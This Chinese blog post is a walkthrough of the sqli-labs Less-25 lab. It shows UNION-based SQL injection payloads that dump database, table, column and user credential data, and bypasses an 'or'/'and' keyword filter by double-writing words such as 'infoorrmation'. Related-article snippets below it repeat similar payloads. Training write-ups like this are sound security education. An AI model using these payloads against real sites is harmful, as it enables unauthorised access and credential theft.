sqli-labs/Less-25

最新推荐文章于 2024-04-20 12:18:26 发布
最新推荐文章于 2024-04-20 12:18:26 发布
阅读量190 收藏
点赞数
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71299382/article/details/127943318
版权

这一关又变成了get请求了

从欢迎界面我们可以知道的是他要我们以id作为参数名称

首先我们先判断一下注入类型

输入如下

id=1 and 1=2;--+

从这里我们可以知道#注释符不起作用了 被注释了

所以只能用--+注释符

这个语句正确回显了

所以属于字符型注入

然后在输入一下如下语句

id=1'

回显如下

然后佐证一下 使用我们刚才判断出来的注释符

回显如下

 

这一关我们就用联合注入吧

输入如下

id=-1' union select 1,2,3;--+

 回显如下 可知回显点

接着进行爆库/版本操作

 输入如下

id=-1' union select 1,database(),version();--+

回显如下

接着进行爆表操作

输入如下

id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database();--+

 竟然报错了

提示我们无法访问table表格 于是我怀疑到了information上了因为这个名称存在or这个显眼的词 可能会被过滤掉 因此我们需要进行双写绕过处理 将information写成infoorrmation

成功回显

然后进行爆字段操作

输入如下

id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.tables where table_schema=database() and table_name='users';--+

 还是报错了

报错如下

我怀疑是and出了问题 所以我怀疑后台服务器过滤了逻辑运算符

我将and写成anandd试试看

成功回显

接着进行爆用户民和密码的操作 

输入如下

id=-1' union select 1,2,group_concat(username,password) from users;--+

我去有报错了 原来问题处在了password身上 因为他中间含有一个or

我们将password写成passwoorrd

也是成功回显

这时候我才发现欢迎界面的提示语or和and属于题目 害我判断了半天 嗨嗨 没事 加深印象

axihaihai
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
SQLi-LABS Less-25&&Less-25a
m0_64898960的博客
04-26 2063
Less-25题目 进入题目看到这样的一句话,英语不好 百度翻译 好吧,试了下,只是回显输入的语句,个人感觉没啥用…闭合条件为“ ’ ”,而且好像可以用注释符了… 查字段,看图片提示好像不可以使用or和and,应该是此处不能用order by来查的原因所以改用union select 查数据库 接下来正常的联合查询是有or的,如information…所以我们得另寻道路 尝试大小写如INFORMATION,报错 大小写如infOrmation,报错。猜测大小写是绕不过了… 尝试hex编码(url
生命在于折腾——SQL注入的实操(五)less21-25
易水哲的博客
08-21 410
sql-lib项目,本篇文章介绍关卡21-25。 闭合变成了双引号,其余和上一关一样。 这一关过滤了注释符号,不看php文件会感觉无从下手,查看源代码发现吧# --+注释符号给过滤掉了,这里使用’。输入http://sql/Less-23/?id=’ union select 1,13,database() ’ 输入http://sql/Less-23/?id=’ union select 1,2,group_concat(table_na
sql绕过less-23 less-25 less-26 less-27 以及一点http头注入 less-18 less-5
weixin_74182283的博客
04-01 1257
拆分该语句 为了完成绕过,需要先将id进行闭合 因此语句为 id='xx' || 1',此时多了个单引号出来,因此需要将其闭合,变成id='xx' || '1',语句为id='xx' || '1' 这时,因为||是可以替代or来进行使用的(这个是学计算机的基本常识),在语法中相当于或者,而此时右边的 '1' 永远为真(因为 '1' 永远都是’1‘ )因此可以通过该语句直接完成绕过。而我们这里的http头注入所运用的报错函数,他就是需要~才能导致报错的出现,因此只要存在波浪线,就可以确保这个函数报错。
sqli-labs————less 25(绕or\and)
Fly_鹏程万里
05-12 982
Less-25从关卡提示,我们可以知晓该关卡主要过滤了“or”和“and”,那么我们看看它的源代码到底是如何过滤的:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns...
SQLi LABS Less 25 联合注入+报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-28 1万+
SQLi 第二十五关,SQLi-LABS Less-25SQLi-LABS Less 25SQLiLABS Less25SQLi Less 25
Sqli-labs靶场第25关[Sqli-labs-less-25]自动化注入-SQLmap工具注入
最新发布
m0_73615178的博客
04-20 329
使用的函数是 preg_replace 特点:只对值进行一次检测。
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs实验指导手册
11-17
3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合注入,但闭合字符为`)`或`"`,需要相应地调整注入语句。 4. **错误回显注入**(如less-5): - **利用`updatexml`函数**:即使没有直接...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
下载 sqli-labs 工程,文件名为 sqli_labs_sqli-for7.zip。将下载好的压缩包解压到 phpstudy 的网站根目录下,例如 D:/phpstudy_pro/WWW/。文件夹名字可以自定义,但是要跟 phpstudy 中指定的域名一致,这个就是后面...
sqli-labs lesson8 python 脚本源代码(修复小bug后的版本)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈
sqli-labs 第25关(过滤or和AND )
qq_46527080的博客
12-25 1600
25关 源码分析 发现闭合点是的单引号 将or和AND替换成了空格 然后我们就来思路了,我们可以使用联合查询还有报错查询 一、判断注入点 二、判断列数 发现很直观的把我们的or给过滤掉了 我们试试双写 三、构造payload ?id=-1' union select 1,2,3--+ 1.爆库、 ?id=-1' union select 1,group_concat(schema_name),3 from infoorrmation_schema.schemata --+ 由于information
sqli-labs-master第2525a关
m_ing
05-17 712
25关 http://192.168.89.139/sqli-labs-master/Less-25/ 我们看到提示:过滤‘or’和‘and’。为了进一步确认看下源代码 确实是这样,我们想一下还有哪些逻辑运算符: 那就直接改为|| &&利用 http://192.168.89.139/sqli-labs-master/Less-25/?id=1%27%20||%201=1%20%23 剩下的注入方式都和以前同样,就不测试了… 第25a关 这关和二十五关一样,这是过滤了注释符和or
SQL-LABS 25
qq_52863655的博客
08-26 225
第二十五关: 直接开始验证它的闭合符号。发现是单引号闭合,然后查列 利用 order by http://127.0.0.1/sqli/Less-25/?id=122’ order by 2 查看底下的蓝字发现少了or 所以猜测对or进行了绕过。所以采用union select进行查询 http://127.0.0.1/sqli/Less-25/?id=122’ union select 1,2,3–+ 可以查询出。接下来就是常规注入。 查库:http://127.0.0.1/sqli/Less-25/?
基于Sqli-Labs靶场的SQL注入-25~28关
Joker
01-07 1421
这一篇博客我主要讲了各种语句被注释后的绕过方法,包括 and 和 or 的绕过、空格和注释符的绕过、union 和 select 的绕过。
sqli-labs 23-35闯关
小龙在线
09-24 602
第二十三关:过滤#和–注释+单引号闭合绕过+报错注入 单引号闭合绕过注入 # 获取数据库 id=0' union select 1,2,database()' id=0' union select 1,2,group_concat(schema_name) from information_schema.schemata where 1='1 # Your Password:information_schema,security # 获取数据库 id=0' union select 1,2,group_c
Sqli-labs之Less-25和Less-25a
→_→
04-21 873
Less-25 GET-基于错误-您所有的OR&AND都属于我们-字符串单引号 Notice: Undefined variable: hint in C:\phpStudy\WWW\sqli\Less-25\index.php on line 81 Hint: Your Input is ...
sqli-labs\Less 25~30
Gjqhs的博客
03-11 1094
less-25——过滤了or和and的单引号注入 http://127.0.0.1/sqli-labs/Less-25/?id=-1%27%20union%20select%201,2,3--+ less-26——基于单引号字符型过滤了注释和空格的注入 http://127.0.0.1/sqli-labs/Less-26/?id=-1%27aandnd(updatexml(1,%27aaaa%27,1))anandd%271%27=%271 less-27——基于’字符型过滤了unio.
sqli-labs Less-2525a(sqli-labs闯关指南 2525a)
m0_54899775的博客
12-25 913
sqli-labs Less-2525a(sqli-labs闯关指南 2525a)
sqli-labs/Less-28
01-09
1. 打开sqli-labs实验平台,并找到Less-28实验。 2. 在输入框中输入以下内容进行注入: ``` ' or 1=1)# ``` 这个注入语句的作用是闭合原始查询并使其返回所有结果。 3. 提交注入语句并查看结果。如果页面显示了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

axihaihai

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值